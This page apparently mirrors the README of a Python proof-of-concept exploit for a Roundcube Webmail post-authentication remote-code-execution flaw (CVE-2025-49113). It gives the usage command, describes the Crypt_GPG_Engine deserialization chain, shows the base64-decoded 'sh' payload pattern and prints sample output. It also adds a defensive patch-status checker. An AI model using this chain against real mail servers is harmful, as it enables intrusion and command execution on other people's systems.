Associated vulnerability
Title:
Roundcube Webmail security vulnerability
(CVE-2025-49113)
Description: Roundcube Webmail is an open-source, browser-based IMAP client from Roundcube that supports address book management, message search, spell checking and more. Roundcube Webmail versions before 1.5.10 and versions before 1.6.11 contain a security vulnerability: the `_from` parameter is not validated, which can lead to a PHP object deserialization attack.
Description
💥 Python Exploit for CVE-2025-49113 | Roundcube Webmail RCE via PHP Object Injection
Introduction
# CVE-2025-49113 – Roundcube Webmail RCE Exploit (Python PoC)
> **CVE ID:** CVE-2025-49113
> **Exploit Type:** Remote Code Execution (via PHP Object Injection)
> **Application:** Roundcube Webmail ≤ 1.5.9 and ≤ 1.6.10
> **Exploit Language:** Python
> **Author:** 00xCanelo
> **Status:** Tested and Working on Vulnerable Roundcube Installations
---
## 📌 Description
This exploit leverages a vulnerability in how Roundcube Webmail handles uploaded image filenames, which are unserialized as PHP objects. By crafting a malicious payload that triggers a `Crypt_GPG_Engine` deserialization chain, remote command execution can be achieved **post-authentication**.
This Python PoC mimics the attack chain used by the public PHP exploit, but with cleaner logic, optional logging, and easier use in offensive tooling setups.
---
## 🚧 Prerequisites
- Vulnerable Roundcube version (≤1.5.9 or ≤1.6.10)
- Valid user credentials on Roundcube
- Python 3.x environment
- `pip install requests`
---
## 🚀 Exploitation Steps
```bash
python3 CVE-2025-49113.py <target_url> <username> <password> <command>
```
### Example:
```bash
python3 CVE-2025-49113.py https://mail.target.htb/ user@target.htb 'P@ssw0rd123' 'id'
```
---
## 🔐 Vulnerable Chain
The PHP class `Crypt_GPG_Engine` allows setting a `_gpgconf` field, which is then passed to shell execution.
Our payload places the following shell command:
```sh
echo "<base64-encoded-cmd>" | base64 -d | sh
```
in `_gpgconf`, which leads to RCE upon deserialization.
---
## 💣 Sample Output
```bash
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!
```
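As an added defender-side example (not part of this PoC or of Roundcube itself): a patch-status check that maps the affected ranges stated on this page (before 1.5.10, and 1.6.x before 1.6.11) onto version values, including the numeric form shown in the sample output (`10606`), which this code assumes encodes `major*10000 + minor*100 + patch`. The inventory at the bottom is constructed sample data.

```python
import re

def parse_version(value):
    """Return (major, minor, patch) from '1.6.6' or the numeric form '10606'.

    The numeric decoding (major*10000 + minor*100 + patch) is an assumption
    made by this example, consistent with 10606 -> 1.6.6 in the sample output.
    """
    text = str(value).strip()
    dotted = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", text)
    if dotted:
        return tuple(int(part) for part in dotted.groups())
    if text.isdigit():
        number = int(text)
        return (number // 10000, (number // 100) % 100, number % 100)
    raise ValueError(f"unrecognised Roundcube version: {value!r}")

def is_affected(value):
    """True if the version falls inside the ranges stated for CVE-2025-49113."""
    version = parse_version(value)
    if version < (1, 5, 10):          # everything before 1.5.10 (1.5.x and older)
        return True
    if version[:2] == (1, 6) and version < (1, 6, 11):   # 1.6.0 .. 1.6.10
        return True
    return False                      # 1.5.10+, 1.6.11+, or a newer branch

def hosts_needing_patch(inventory):
    """Given {host: version}, return the sorted hosts still running affected builds."""
    return sorted(host for host, ver in inventory.items() if is_affected(ver))

if __name__ == "__main__":
    # Constructed sample inventory (hypothetical hostnames and versions).
    sample = {
        "mail-a.example.test": "10606",   # numeric form, as in the sample output
        "mail-b.example.test": "1.6.11",  # fixed release
        "mail-c.example.test": "1.5.9",   # last affected 1.5.x
        "mail-d.example.test": "1.5.10",  # fixed release
    }
    for host in hosts_needing_patch(sample):
        print(f"[!] {host} runs an affected Roundcube version; upgrade required")
```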
---
## 📁 File Structure
```
.
├── CVE-2025-49113.py # Python PoC script
└── README.md # This documentation
```
---
## ⚠️ Disclaimer
This code is for **educational and authorized security testing** purposes only. Any misuse of this tool is strictly prohibited. The author is not responsible for any damages caused.
---
## 🧠 References
- https://nvd.nist.gov/vuln/detail/CVE-2025-49113
- https://github.com/roundcube/roundcubemail/issues/9312
- https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/
File snapshot
[4.0K] /data/pocs/b489cf5557177a4daa9eac672601d20031b9cf99
├── [4.5K] CVE-2025-49113.py
└── [2.3K] README.md
0 directories, 2 files
Notes
1. Accessing the PoC through the original source is recommended.
2. If the source has become unavailable or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.